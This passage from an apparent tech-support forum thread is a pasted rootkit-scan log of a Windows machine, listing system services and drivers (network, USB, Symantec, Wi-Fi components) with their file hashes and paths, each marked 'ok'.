12:17:12.0965 0x1aa8 [ 02071D207A9858FBE3A48CBFD59C4A04, FEA4DEBAEC3465E0C7C1E8B721805922F6BBCB96A60A193B11688F4252F4B89E ] SrvHsfV92 C:\Windows\system32\DRIVERS\VSTDPV6.SYS
12:17:13.0026 0x1aa8 SrvHsfV92 - ok
12:17:13.0053 0x1aa8 [ 18E40C245DBFAF36FD0134A7EF2DF396, 0138A68958112101A5D3BD94114F320CE80B0C9A93E009AC78DE7415FCCC7DE7 ] SrvHsfWinac C:\Windows\system32\DRIVERS\VSTCNXT6.SYS
12:17:13.0093 0x1aa8 SrvHsfWinac - ok
12:17:13.0105 0x1aa8 [ 27E461F0BE5BFF5FC737328F749538C3, AFA4704ED8FFC1A0BAB40DFB81D3AE3F3D933A3C9BF54DDAF39FF9AF3646D9E6 ] srvnet C:\Windows\system32\DRIVERS\srvnet.sys
12:17:13.0122 0x1aa8 srvnet - ok
12:17:13.0132 0x1aa8 [ 51B52FBD583CDE8AA9BA62B8B4298F33, 2E2403F8AA39E79D1281CA006B51B43139C32A5FDD64BD34DAA4B935338BD740 ] SSDPSRV C:\Windows\System32\ssdpsrv.dll
12:17:13.0174 0x1aa8 SSDPSRV - ok
12:17:13.0180 0x1aa8 [ AB7AEBF58DAD8DAAB7A6C45E6A8885CB, D21CDBC4C2AA0DB5B4455D5108B0CAF4282A2E664B9035708F212CC094569D9D ] SstpSvc C:\Windows\system32\sstpsvc.dll
12:17:13.0221 0x1aa8 SstpSvc - ok
12:17:13.0230 0x1aa8 [ F38232291F05CE25BA1C47FB51EB64CB, 7F72E87D02F3072E0D61D528BEBB8F4BFB6AD67FC94A93745493C9A0907FF435 ] ssudmdm C:\Windows\system32\DRIVERS\ssudmdm.sys
12:17:13.0246 0x1aa8 ssudmdm - ok
12:17:13.0260 0x1aa8 [ C155C5347D546A3CC859071BB7342899, CD7AA2B4C3181DEDF37ACA306F2A73639F3077BF44220FCB839E1B0D61802D9B ] STacSV C:\Program Files\IDT\WDM\STacSV64.exe
12:17:13.0286 0x1aa8 STacSV - ok
12:17:13.0290 0x1aa8 [ F3817967ED533D08327DC73BC4D5542A, 1B204454408A690C0A86447F3E4AA9E7C58A9CFB567C94C17C21920BA648B4D5 ] stexstor C:\Windows\system32\drivers\stexstor.sys
12:17:13.0301 0x1aa8 stexstor - ok
12:17:13.0320 0x1aa8 [ FB0274E54956158657E80BEC8F442ED3, 7048174B31176B1751A11F7A9C1BDBFBD56CB7AE42C033B8BBABCFBCFADCDE3D ] STHDA C:\Windows\system32\DRIVERS\stwrt64.sys
12:17:13.0351 0x1aa8 STHDA - ok
12:17:13.0372 0x1aa8 [ 8DD52E8E6128F4B2DA92CE27402871C1, 1101C38BE8FC383B5F2F9FA402F9652B23B88A764DE2B584DFE62B88B11DEF92 ] stisvc C:\Windows\System32\wiaservc.dll
12:17:13.0407 0x1aa8 stisvc - ok
12:17:13.0411 0x1aa8 [ D01EC09B6711A5F8E7E6564A4D0FBC90, 3CB922291DBADC92B46B9E28CCB6810CD8CCDA3E74518EC9522B58B998E1F969 ] swenum C:\Windows\system32\drivers\swenum.sys
12:17:13.0423 0x1aa8 swenum - ok
12:17:13.0441 0x1aa8 [ E08E46FDD841B7184194011CA1955A0B, 9C3725BB1F08F92744C980A22ED5C874007D3B5863C7E1F140F50061052AC418 ] swprv C:\Windows\System32\swprv.dll
12:17:13.0496 0x1aa8 swprv - ok
12:17:13.0514 0x1aa8 [ 5C9EE2303CA7F267665D75237862B39C, 5DECD977A823C14B4D980D3DB621BC875231B741653F0450A027FC9E87725F9D ] SymDS C:\Windows\system32\drivers\NISx64\1503000.00C\SYMDS64.SYS
12:17:13.0537 0x1aa8 SymDS - ok
12:17:13.0574 0x1aa8 [ 9F31630D7FC2DD9D5DA1CE359AAD1F46, 296D29EDF53956D1899DE4669AB429C280DF9F183F00AE1CE528E7C575802235 ] SymEFA C:\Windows\system32\drivers\NISx64\1503000.00C\SYMEFA64.SYS
12:17:13.0614 0x1aa8 SymEFA - ok
12:17:13.0625 0x1aa8 [ 97E11C50CE52277B377396EA8838E539, E17D03F80E14F961C41F2D54D1EF73D29BF01F38459C5710D786234F8BA3C835 ] SymEvent C:\Windows\system32\Drivers\SYMEVENT64x86.SYS
12:17:13.0639 0x1aa8 SymEvent - ok
12:17:13.0650 0x1aa8 [ 48C2934683CBD06F662B088EEF49EF6A, 2212A3588C28F33EFCB1D34618B3054EBBAC6731D177A581D21D1F969FE040C0 ] SymIRON C:\Windows\system32\drivers\NISx64\1503000.00C\Ironx64.SYS
12:17:13.0666 0x1aa8 SymIRON - ok
12:17:13.0687 0x1aa8 [ 5570A74FF9B1EFBC5154DD1E2F05C517, 2C883A0334CBE4AE257028805C9BB1E529A80F56BA6D341E8EBB83CB3E46FEB7 ] SymNetS C:\Windows\System32\Drivers\NISx64\1503000.00C\SYMNETS.SYS
12:17:13.0714 0x1aa8 SymNetS - ok
12:17:13.0730 0x1aa8 [ AC3CC98B1BDB6540021D3FFB105AC2B9, 671146CC16139AECE0BCCC44983807E045A930E262F64461D0D882A0A0B77E4F ] SynTP C:\Windows\system32\DRIVERS\SynTP.sys
12:17:13.0751 0x1aa8 SynTP - ok
12:17:13.0801 0x1aa8 [ BF9CCC0BF39B418C8D0AE8B05CF95B7D, 3C13217548BE61F2BDB8BD41F77345CDDA1F97BF0AE17241C335B9807EB3DBB8 ] SysMain C:\Windows\system32\sysmain.dll
12:17:13.0878 0x1aa8 SysMain - ok
12:17:13.0886 0x1aa8 [ E3C61FD7B7C2557E1F1B0B4CEC713585, 01F0E116606D185BF93B540868075BFB1A398197F6AABD994983DBFF56B3A8A0 ] TabletInputService C:\Windows\System32\TabSvc.dll
12:17:13.0909 0x1aa8 TabletInputService - ok
12:17:13.0921 0x1aa8 [ 40F0849F65D13EE87B9A9AE3C1DD6823, E251A7EF3D0FD2973AF33A62FC457A7E8D5E8694208F811F52455F7C2426121F ] TapiSrv C:\Windows\System32\tapisrv.dll
12:17:13.0969 0x1aa8 TapiSrv - ok
12:17:13.0975 0x1aa8 [ 1BE03AC720F4D302EA01D40F588162F6, AB644862BF1D2E824FD846180DEC4E2C0FAFCC517451486DE5A92E5E78A952E4 ] TBS C:\Windows\System32\tbssvc.dll
12:17:14.0012 0x1aa8 TBS - ok
12:17:14.0064 0x1aa8 [ 40AF23633D197905F03AB5628C558C51, 644656A15236E964E4BE57B42225EAA5643C4CF1FFF6D306813A000716F9D72C ] Tcpip C:\Windows\system32\drivers\tcpip.sys
12:17:14.0134 0x1aa8 Tcpip - ok
12:17:14.0191 0x1aa8 [ 40AF23633D197905F03AB5628C558C51, 644656A15236E964E4BE57B42225EAA5643C4CF1FFF6D306813A000716F9D72C ] TCPIP6 C:\Windows\system32\DRIVERS\tcpip.sys
12:17:14.0253 0x1aa8 TCPIP6 - ok
12:17:14.0263 0x1aa8 [ 1B16D0BD9841794A6E0CDE0CEF744ABC, 7EB8BA97339199EEE7F2B09DA2DA6279DA64A510D4598D42CF86415D67CD674C ] tcpipreg C:\Windows\system32\drivers\tcpipreg.sys
12:17:14.0276 0x1aa8 tcpipreg - ok


----------



## raphael100 (May 24, 2014)

12:17:14.0282 0x1aa8 [ 3371D21011695B16333A3934340C4E7C, 7416F9BBFC1BA9D875EA7D1C7A0D912FC6977B49A865D67E3F9C4E18A965082D ] TDPIPE C:\Windows\system32\drivers\tdpipe.sys
12:17:14.0296 0x1aa8 TDPIPE - ok
12:17:14.0300 0x1aa8 [ 51C5ECEB1CDEE2468A1748BE550CFBC8, 4E8F83877330B421F7B5D8393D34BC44C6450E69209DAA95B29CB298166A5DF9 ] TDTCP C:\Windows\system32\drivers\tdtcp.sys
12:17:14.0313 0x1aa8 TDTCP - ok
12:17:14.0320 0x1aa8 [ DDAD5A7AB24D8B65F8D724F5C20FD806, B71F2967A4EE7395E4416C1526CB85368AEA988BDD1F2C9719C48B08FAFA9661 ] tdx C:\Windows\system32\DRIVERS\tdx.sys
12:17:14.0356 0x1aa8 tdx - ok
12:17:14.0362 0x1aa8 [ 561E7E1F06895D78DE991E01DD0FB6E5, 83BFA50A528762EC52A011302AC3874636FB7E26628CD7ACFBF2BDC9FAA8110D ] TermDD C:\Windows\system32\drivers\termdd.sys
12:17:14.0374 0x1aa8 TermDD - ok
12:17:14.0398 0x1aa8 [ 2E648163254233755035B46DD7B89123, 6FA0D07CE18A3A69D82EE49D875F141E39406E92C34EAC76AC4EB052E6EBCBCD ] TermService C:\Windows\System32\termsrv.dll
12:17:14.0454 0x1aa8 TermService - ok
12:17:14.0460 0x1aa8 [ F0344071948D1A1FA732231785A0664C, DB9886C2C858FAF45AEA15F8E42860343F73EB8685C53EC2E8CCC10586CB0832 ] Themes C:\Windows\system32\themeservice.dll
12:17:14.0480 0x1aa8 Themes - ok
12:17:14.0486 0x1aa8 [ E40E80D0304A73E8D269F7141D77250B, 0DB4AC13A264F19A84DC0BCED54E8E404014CC09C993B172002B1561EC7E265A ] THREADORDER C:\Windows\system32\mmcss.dll
12:17:14.0526 0x1aa8 THREADORDER - ok
12:17:14.0534 0x1aa8 [ 7E7AFD841694F6AC397E99D75CEAD49D, DE87F203FD8E6BDCCFCA1860A85F283301A365846FB703D9BB86278D8AC96B07 ] TrkWks C:\Windows\System32\trkwks.dll
12:17:14.0577 0x1aa8 TrkWks - ok
12:17:14.0586 0x1aa8 [ 773212B2AAA24C1E31F10246B15B276C, F2EF85F5ABA307976D9C649D710B408952089458DDE97D4DEF321DF14E46A046 ] TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
12:17:14.0628 0x1aa8 TrustedInstaller - ok
12:17:14.0635 0x1aa8 [ 4CE278FC9671BA81A138D70823FCAA09, CBE501436696E32A3701B9F377B823AC36647B6626595F76CC63E2396AD7D300 ] tssecsrv C:\Windows\system32\DRIVERS\tssecsrv.sys
12:17:14.0648 0x1aa8 tssecsrv - ok
12:17:14.0654 0x1aa8 [ E9981ECE8D894CEF7038FD1D040EB426, DCDDCE933CAECE8180A3447199B07F2F0413704EEC1A09606EE357901A84A7CF ] TsUsbFlt C:\Windows\system32\drivers\tsusbflt.sys
12:17:14.0669 0x1aa8 TsUsbFlt - ok
12:17:14.0673 0x1aa8 [ AD64450A4ABE076F5CB34CC08EEACB07, B5C386635441A19178E7FEEE299BA430C8D72F9110866C13A216B12A1080AD12 ] TsUsbGD C:\Windows\system32\drivers\TsUsbGD.sys
12:17:14.0687 0x1aa8 TsUsbGD - ok
12:17:14.0694 0x1aa8 [ 3566A8DAAFA27AF944F5D705EAA64894, AE9D8B648DA08AF667B9456C3FE315489859C157510A258559F18238F2CC92B8 ] tunnel C:\Windows\system32\DRIVERS\tunnel.sys
12:17:14.0730 0x1aa8 tunnel - ok
12:17:14.0736 0x1aa8 [ B4DD609BD7E282BFC683CEC7EAAAAD67, EF131DB6F6411CAD36A989A421AF93F89DD61601AC524D2FF11C10FF6E3E9123 ] uagp35 C:\Windows\system32\drivers\uagp35.sys
12:17:14.0748 0x1aa8 uagp35 - ok
12:17:14.0761 0x1aa8 [ FF4232A1A64012BAA1FD97C7B67DF593, D8591B4EB056899C7B604E4DD852D82D4D9809F508ABCED4A03E1BE6D5D456E3 ] udfs C:\Windows\system32\DRIVERS\udfs.sys
12:17:14.0812 0x1aa8 udfs - ok
12:17:14.0828 0x1aa8 [ 6234CB2FEF5AB860DD50EF1902FFFF08, 825E2A417A44861306A8320EB4FC5E80E68DED0041A2E6F3DDBABA33969B0355 ] UI Assistant Service C:\Program Files (x86)\SMART BRO\AssistantServices.exe
12:17:14.0845 0x1aa8 UI Assistant Service - ok
12:17:14.0850 0x1aa8 [ 3CBDEC8D06B9968ABA702EBA076364A1, B8DAB8AA804FC23021BFEBD7AE4D40FBE648D6C6BA21CC008E26D1C084972F9B ] UI0Detect C:\Windows\system32\UI0Detect.exe
12:17:14.0867 0x1aa8 UI0Detect - ok
12:17:14.0872 0x1aa8 [ 4BFE1BC28391222894CBF1E7D0E42320, 5918B1ED2030600DF77BDACF1C808DF6EADDD8BF3E7003AF1D72050D8B102B3A ] uliagpkx C:\Windows\system32\drivers\uliagpkx.sys
12:17:14.0884 0x1aa8 uliagpkx - ok
12:17:14.0890 0x1aa8 [ DC54A574663A895C8763AF0FA1FF7561, 09A3F3597E91CBEB2F38E96E75134312B60CAE5574B2AD4606C2D3E992AEDDFE ] umbus C:\Windows\system32\DRIVERS\umbus.sys
12:17:14.0904 0x1aa8 umbus - ok
12:17:14.0908 0x1aa8 [ B2E8E8CB557B156DA5493BBDDCC1474D, F547509A08C0679ACB843E20C9C0CF51BED1B06530BBC529DFB0944504564A43 ] UmPass C:\Windows\system32\drivers\umpass.sys
12:17:14.0922 0x1aa8 UmPass - ok
12:17:14.0999 0x1aa8 [ B1719E9B50C48512FB51A0CC94DB5879, 6CFB657DC171BC3EBC5B09558C5F85820D49A846D9A19DDB1BDF6511682DA1B6 ] UNS C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
12:17:15.0083 0x1aa8 UNS - ok
12:17:15.0101 0x1aa8 [ D47EC6A8E81633DD18D2436B19BAF6DE, 0FB461E2D5E0B75BB5958F6362F4880BFA4C36AD930542609BCAF574941AA7AE ] upnphost C:\Windows\System32\upnphost.dll
12:17:15.0150 0x1aa8 upnphost - ok
12:17:15.0158 0x1aa8 [ B0435098C81D04CAFFF80DDB746CD3A2, A17B207740382E38729571F0B0BC98FF874E856A7C7CE9EB930328A2AD88F52A ] usbaudio C:\Windows\system32\drivers\usbaudio.sys
12:17:15.0175 0x1aa8 usbaudio - ok
12:17:15.0181 0x1aa8 [ DCA68B0943D6FA415F0C56C92158A83A, BEE5A5B33B22D1DF50B884D46D89FC3B8286EB16E38AD5A20F0A49E5C6766C57 ] usbccgp C:\Windows\system32\DRIVERS\usbccgp.sys
12:17:15.0198 0x1aa8 usbccgp - ok
12:17:15.0205 0x1aa8 [ 80B0F7D5CCF86CEB5D402EAAF61FEC31, 140C62116A425DEAD25FE8D82DE283BC92C482A9F643658D512F9F67061F28AD ] usbcir C:\Windows\system32\drivers\usbcir.sys
12:17:15.0223 0x1aa8 usbcir - ok
12:17:15.0230 0x1aa8 [ 18A85013A3E0F7E1755365D287443965, 811C5EDF38C765BCF71BCE25CB6626FF6988C3699F5EF1846240EA0052F34C33 ] usbehci C:\Windows\system32\drivers\usbehci.sys
12:17:15.0248 0x1aa8 usbehci - ok
12:17:15.0264 0x1aa8 [ 8D1196CFBB223621F2C67D45710F25BA, B5D7AFE51833B24FC9576F3AED3D8A2B290E5846060E73F9FFFAC1890A8B6003 ] usbhub C:\Windows\system32\DRIVERS\usbhub.sys
12:17:15.0290 0x1aa8 usbhub - ok
12:17:15.0294 0x1aa8 [ 765A92D428A8DB88B960DA5A8D6089DC, 56DE8A2ED58E53B202C399CA7BACB1551136303C2EE0AB426BDBBF880E3C542C ] usbohci C:\Windows\system32\drivers\usbohci.sys
12:17:15.0308 0x1aa8 usbohci - ok
12:17:15.0312 0x1aa8 [ 73188F58FB384E75C4063D29413CEE3D, B485463933306036B1D490722CB1674DC85670753D79FA0EF7EBCA7BBAAD9F7C ] usbprint C:\Windows\system32\DRIVERS\usbprint.sys
12:17:15.0330 0x1aa8 usbprint - ok
12:17:15.0336 0x1aa8 [ 9661DA76B4531B2DA272ECCE25A8AF24, FEA93254A21E71A7EB8AD35FCCAD2C1E41F7329EC33B1734F5B41307A34D8637 ] usbscan C:\Windows\system32\DRIVERS\usbscan.sys
12:17:15.0351 0x1aa8 usbscan - ok
12:17:15.0357 0x1aa8 [ FED648B01349A3C8395A5169DB5FB7D6, DC4D7594C24ADD076927B9347F1B50B91CF03A4ABDB284248D5711D9C19DEB96 ] USBSTOR C:\Windows\system32\DRIVERS\USBSTOR.SYS
12:17:15.0374 0x1aa8 USBSTOR - ok
12:17:15.0379 0x1aa8 [ DD253AFC3BC6CBA412342DE60C3647F3, 146F8613F1057AC054DC3593E84BC52899DA27EA33B0E72ACFB78C3699ADCDE7 ] usbuhci C:\Windows\system32\drivers\usbuhci.sys
12:17:15.0392 0x1aa8 usbuhci - ok
12:17:15.0401 0x1aa8 [ 1F775DA4CF1A3A1834207E975A72E9D7, 6D3DE5BD3EF3A76E997E5BAF900C51D25308F5A9682D1F62017F577A24095B90 ] usbvideo C:\Windows\system32\Drivers\usbvideo.sys
12:17:15.0419 0x1aa8 usbvideo - ok
12:17:15.0423 0x1aa8 [ EDBB23CBCF2CDF727D64FF9B51A6070E, 7202484C8E1BFB2AFD64D8C81668F3EDE0E3BF5EB27572877A0A7B337AE5AE42 ] UxSms C:\Windows\System32\uxsms.dll
12:17:15.0461 0x1aa8 UxSms - ok
12:17:15.0466 0x1aa8 [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] VaultSvc C:\Windows\system32\lsass.exe
12:17:15.0481 0x1aa8 VaultSvc - ok
12:17:15.0485 0x1aa8 [ C5C876CCFC083FF3B128F933823E87BD, 6FE0FBB6C3207E09300E0789E2168F76668D87C317FE9F263E733827ADCFBE0D ] vdrvroot C:\Windows\system32\drivers\vdrvroot.sys
12:17:15.0497 0x1aa8 vdrvroot - ok
12:17:15.0516 0x1aa8 [ 8D6B481601D01A456E75C3210F1830BE, A2CEF483F4231367138EEF7E67FD5BE5364FC0780C44CA1368E36CE4AA3D0633 ] vds C:\Windows\System32\vds.exe
12:17:15.0573 0x1aa8 vds - ok
12:17:15.0578 0x1aa8 [ DA4DA3F5E02943C2DC8C6ED875DE68DD, EDE604536DB78C512D68C92B26DA77C8811AC109D1F0A473673F0A82D15A2838 ] vga C:\Windows\system32\DRIVERS\vgapnp.sys
12:17:15.0595 0x1aa8 vga - ok
12:17:15.0599 0x1aa8 [ 53E92A310193CB3C03BEA963DE7D9CFC, 45898604375B42EB1246C17A22D91C2440F11C746FF6459AD38027C1BC2E3125 ] VgaSave C:\Windows\System32\drivers\vga.sys
12:17:15.0638 0x1aa8 VgaSave - ok
12:17:15.0648 0x1aa8 [ 2CE2DF28C83AEAF30084E1B1EB253CBB, D1946816A1CB89F825CBEA58F94A4C9D0CE7249355CD3915563F54054EE564BF ] vhdmp C:\Windows\system32\drivers\vhdmp.sys
12:17:15.0666 0x1aa8 vhdmp - ok
12:17:15.0670 0x1aa8 [ E5689D93FFE4E5D66C0178761240DD54, 6D35CED80681B12AAF63BFA0DA1C386E71D3838839B68A686990AA8031949D27 ] viaide C:\Windows\system32\drivers\viaide.sys
12:17:15.0683 0x1aa8 viaide - ok
12:17:15.0689 0x1aa8 [ D2AAFD421940F640B407AEFAAEBD91B0, 31EF342A60AF04F4108759A71F8FB7B8C8819216CF3D16A95B2BA0E33A8A9161 ] volmgr C:\Windows\system32\drivers\volmgr.sys
12:17:15.0701 0x1aa8 volmgr - ok
12:17:15.0715 0x1aa8 [ A255814907C89BE58B79EF2F189B843B, 463DB771851352185B6AC323BD93B9084D47291E53C1F7B628B65D6918B2E28F ] volmgrx C:\Windows\system32\drivers\volmgrx.sys
12:17:15.0737 0x1aa8 volmgrx - ok
12:17:15.0749 0x1aa8 [ DF8126BD41180351A093A3AD2FC8903B, AEFF4AA89CDDAAAD43CDE17C6B6EB2A397A0AC1651CBD51B889161EC2BC6527A ] volsnap C:\Windows\system32\drivers\volsnap.sys
12:17:15.0768 0x1aa8 volsnap - ok
12:17:15.0776 0x1aa8 [ 5E2016EA6EBACA03C04FEAC5F330D997, 53106EB877459FE55A459111F7AB0EE320BB3B4C954D3DB6FA1642396001F2AC ] vsmraid C:\Windows\system32\drivers\vsmraid.sys
12:17:15.0792 0x1aa8 vsmraid - ok
12:17:15.0838 0x1aa8 [ B60BA0BC31B0CB414593E169F6F21CC2, 47B801E623254CF0202B3591CB5C019CABFB52F123C7D47E29D19B32F1F2B915 ] VSS C:\Windows\system32\vssvc.exe
12:17:15.0925 0x1aa8 VSS - ok
12:17:15.0931 0x1aa8 [ 36D4720B72B5C5D9CB2B9C29E9DF67A1, 3254523C85C70EBA2DBAC05DB2DBA89EDF8E9195F390F7C21F96458FB6B2E3D7 ] vwifibus C:\Windows\system32\DRIVERS\vwifibus.sys
12:17:15.0948 0x1aa8 vwifibus - ok
12:17:15.0953 0x1aa8 [ 6A3D66263414FF0D6FA754C646612F3F, 30F6BA594B0D3B94113064015A16D97811CD989DF1715CCE21CEAB9894C1B4FB ] vwififlt C:\Windows\system32\DRIVERS\vwififlt.sys
12:17:15.0973 0x1aa8 vwififlt - ok
12:17:15.0977 0x1aa8 [ 6A638FC4BFDDC4D9B186C28C91BD1A01, 5521F1DC515586777EC4837E0AEAA3E613CC178AF1074031C4D0D0C695A93168 ] vwifimp C:\Windows\system32\DRIVERS\vwifimp.sys
12:17:15.0995 0x1aa8 vwifimp - ok
12:17:16.0010 0x1aa8 [ 1C9D80CC3849B3788048078C26486E1A, 34A89F31E53F6B6C209B286F580CC2257AE6D057E4E20741F241C9C167947962 ] W32Time C:\Windows\system32\w32time.dll
12:17:16.0061 0x1aa8 W32Time - ok
12:17:16.0068 0x1aa8 [ 4E9440F4F152A7B944CB1663D3935A3E, 8FE04EBD3BC612EE943A21A3E56F37E5C9B578CDACA6044048181DAD81816D53 ] WacomPen C:\Windows\system32\drivers\wacompen.sys
12:17:16.0082 0x1aa8 WacomPen - ok
12:17:16.0088 0x1aa8 [ 356AFD78A6ED4457169241AC3965230C, CE4D1EE3525C10AC658B20776C3E444DE44874C837713DC5311386EDFCB18399 ] WANARP C:\Windows\system32\DRIVERS\wanarp.sys
12:17:16.0127 0x1aa8 WANARP - ok
12:17:16.0132 0x1aa8 [ 356AFD78A6ED4457169241AC3965230C, CE4D1EE3525C10AC658B20776C3E444DE44874C837713DC5311386EDFCB18399 ] Wanarpv6 C:\Windows\system32\DRIVERS\wanarp.sys
12:17:16.0170 0x1aa8 Wanarpv6 - ok
12:17:16.0209 0x1aa8 [ 3CEC96DE223E49EAAE3651FCF8FAEA6C, 4150DAB33E8D61076F1D4767BCAFC9B4ECCCCBD58FD4FB3CFE5B8D27DCDCAB61 ] WatAdminSvc C:\Windows\system32\Wat\WatAdminSvc.exe
12:17:16.0259 0x1aa8 WatAdminSvc - ok
12:17:16.0308 0x1aa8 [ 78F4E7F5C56CB9716238EB57DA4B6A75, 46A4E78CE5F2A4B26F4E9C3FF04A99D9B727A82AC2E390A82A1611C3F6E0C9AF ] wbengine C:\Windows\system32\wbengine.exe
12:17:16.0382 0x1aa8 wbengine - ok
12:17:16.0394 0x1aa8 [ 3AA101E8EDAB2DB4131333F4325C76A3, 4F7BD3DA5E58B18BFF106CFF7B45E75FD13EE556D433C695BA23EC80827E49DE ] WbioSrvc C:\Windows\System32\wbiosrvc.dll
12:17:16.0419 0x1aa8 WbioSrvc - ok
12:17:16.0433 0x1aa8 [ 7368A2AFD46E5A4481D1DE9D14848EDD, 8039C478FC2D9F095F5883A4FA47F9E6EDF57CC88A4AA74F07C88445F90DED57 ] wcncsvc C:\Windows\System32\wcncsvc.dll
12:17:16.0464 0x1aa8 wcncsvc - ok
12:17:16.0469 0x1aa8 [ 20F7441334B18CEE52027661DF4A6129, 7B8E0247234B740FED2BE9B833E9CE8DD7453340123AB43F6B495A7E6A27B0DD ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
12:17:16.0485 0x1aa8 WcsPlugInService - ok
12:17:16.0489 0x1aa8 [ 72889E16FF12BA0F235467D6091B17DC, F2FD0BBD075E33608D93F350D216F97442AB89ABD540513C2D568C78096E12A8 ] Wd C:\Windows\system32\drivers\wd.sys
12:17:16.0501 0x1aa8 Wd - ok
12:17:16.0505 0x1aa8 [ A3D04EBF5227886029B4532F20D026F7, D90F7B9C176008675DA0B5FD7E4973CBC2A04172CEDF8FB7D3B3B4F27B5440D7 ] WDC_SAM C:\Windows\system32\DRIVERS\wdcsam64.sys
12:17:16.0517 0x1aa8 WDC_SAM - ok
12:17:16.0543 0x1aa8 [ E2C933EDBC389386EBE6D2BA953F43D8, AF1DEADD5F1267CCEBD226E8EEB971D1946EA6A5A9645A36F5D111F758AF2F07 ] Wdf01000 C:\Windows\system32\drivers\Wdf01000.sys
12:17:16.0579 0x1aa8 Wdf01000 - ok
12:17:16.0586 0x1aa8 [ BF1FC3F79B863C914687A737C2F3D681, B2DF47AC4931ACFB243775767B77065CC0D98778FC0243C793A3E219EB961209 ] WdiServiceHost C:\Windows\system32\wdi.dll
12:17:16.0619 0x1aa8 WdiServiceHost - ok
12:17:16.0624 0x1aa8 [ BF1FC3F79B863C914687A737C2F3D681, B2DF47AC4931ACFB243775767B77065CC0D98778FC0243C793A3E219EB961209 ] WdiSystemHost C:\Windows\system32\wdi.dll
12:17:16.0645 0x1aa8 WdiSystemHost - ok
12:17:16.0656 0x1aa8 [ 0EB0E5D22B1760F2DBCE632F2DD7A54D, B8A4CC62F88768947FB0A161CF9564DB28FD9C1C037B5475DF192982DE035C22 ] WebClient C:\Windows\System32\webclnt.dll
12:17:16.0678 0x1aa8 WebClient - ok
12:17:16.0689 0x1aa8 [ C749025A679C5103E575E3B48E092C43, B71171D07EE7AB085A24BF3A1072FF2CE7EA021AAE695F6A90640E6EE8EB55C1 ] Wecsvc C:\Windows\system32\wecsvc.dll
12:17:16.0735 0x1aa8 Wecsvc - ok
12:17:16.0741 0x1aa8 [ 7E591867422DC788B9E5BD337A669A08, 484E6BCCDF7ADCE9A1AACAD1BC7C7D7694B9E40FA90D94B14D80C607784F6C75 ] wercplsupport C:\Windows\System32\wercplsupport.dll
12:17:16.0782 0x1aa8 wercplsupport - ok
12:17:16.0788 0x1aa8 [ 6D137963730144698CBD10F202E9F251, A9F522A125158D94F540544CCD4DBF47B9DCE2EA878C33675AFE40F80E8F4979 ] WerSvc C:\Windows\System32\WerSvc.dll
12:17:16.0829 0x1aa8 WerSvc - ok
12:17:16.0833 0x1aa8 [ 611B23304BF067451A9FDEE01FBDD725, 0AF2734B978165FC6FD22B64862132CCE32528A21C698A49D176129446E099C8 ] WfpLwf C:\Windows\system32\DRIVERS\wfplwf.sys
12:17:16.0870 0x1aa8 WfpLwf - ok
12:17:16.0877 0x1aa8 [ 05ECAEC3E4529A7153B3136CEB49F0EC, 9995CB2CEC70A633EA33CBB0DEAD2BB28CB67132B41E9444BDAB9E75744C9A50 ] WIMMount C:\Windows\system32\drivers\wimmount.sys
12:17:16.0891 0x1aa8 WIMMount - ok
12:17:16.0894 0x1aa8 WinDefend - ok
12:17:16.0901 0x1aa8 WinHttpAutoProxySvc - ok
12:17:16.0914 0x1aa8 [ 19B07E7E8915D701225DA41CB3877306, D6555E8D276DBB11358246E0FE215F76F1FB358791C76B88D82C2A66A42DA19F ] Winmgmt C:\Windows\system32\wbem\WMIsvc.dll
12:17:16.0957 0x1aa8 Winmgmt - ok
12:17:17.0013 0x1aa8 [ BCB1310604AA415C4508708975B3931E, 9D943F086D454345153A0DD426B4432532A44FD87950386B186E1CAD2AC70565 ] WinRM C:\Windows\system32\WsmSvc.dll
12:17:17.0116 0x1aa8 WinRM - ok
12:17:17.0129 0x1aa8 [ FE88B288356E7B47B74B13372ADD906D, A16B166F6BB32EF9D2A142F27B9EC54CBC7B3AC915799783CF4C40E525BC9E03 ] WinUsb C:\Windows\system32\DRIVERS\WinUsb.sys
12:17:17.0147 0x1aa8 WinUsb - ok
12:17:17.0175 0x1aa8 [ 4FADA86E62F18A1B2F42BA18AE24E6AA, CE1683386886BF34862681A46199EA7E7FB4232A186047DA7FBD8EC240AF6726 ] Wlansvc C:\Windows\System32\wlansvc.dll
12:17:17.0221 0x1aa8 Wlansvc - ok
12:17:17.0228 0x1aa8 [ 06C8FA1CF39DE6A735B54D906BA791C6, D8FEC7DE227781CDA876904701B2AA995268F74DCD6CB34AA0296C557FC283B6 ] wlcrasvc C:\Program Files\Windows Live\Mesh\wlcrasvc.exe
12:17:17.0238 0x1aa8 wlcrasvc - ok
12:17:17.0307 0x1aa8 [ 2BACD71123F42CEA603F4E205E1AE337, 1FEF20554110371D738F462ECFFA999158EFEED02062414C58C1B61C422BF0B9 ] wlidsvc C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
12:17:17.0382 0x1aa8 wlidsvc - ok
12:17:17.0391 0x1aa8 [ F6FF8944478594D0E414D3F048F0D778, 6F75E0AE6127B33A92A88E59D4B048FD4C15F997807BE7BF0EFE76F95235B1D9 ] WmiAcpi C:\Windows\system32\drivers\wmiacpi.sys
12:17:17.0405 0x1aa8 WmiAcpi - ok
12:17:17.0418 0x1aa8 [ 38B84C94C5A8AF291ADFEA478AE54F93, 1AC267AC73670BEA5F3785C9AD9DB146F8E993A862C843742B21FDB90D102B2A ] wmiApSrv C:\Windows\system32\wbem\WmiApSrv.exe
12:17:17.0439 0x1aa8 wmiApSrv - ok
12:17:17.0442 0x1aa8 WMPNetworkSvc - ok
12:17:17.0447 0x1aa8 [ 96C6E7100D724C69FCF9E7BF590D1DCA, 2E63C9B0893B4FC03B7A71BAEA6202D3D3DB1B52F3643467829B5A573FD7655B ] WPCSvc C:\Windows\System32\wpcsvc.dll
12:17:17.0461 0x1aa8 WPCSvc - ok
12:17:17.0469 0x1aa8 [ 93221146D4EBBF314C29B23CD6CC391D, C0750858A65BF51E210CD244C825C121D67E025CD2D2455139991AAC289A90FE ] WPDBusEnum C:\Windows\system32\wpdbusenum.dll
12:17:17.0487 0x1aa8 WPDBusEnum - ok
12:17:17.0493 0x1aa8 [ 6BCC1D7D2FD2453957C5479A32364E52, E48554D31FBDCF8F985C1C72524CAA9106F5B7CC2B79064F8F5E2562D517F090 ] ws2ifsl C:\Windows\system32\drivers\ws2ifsl.sys
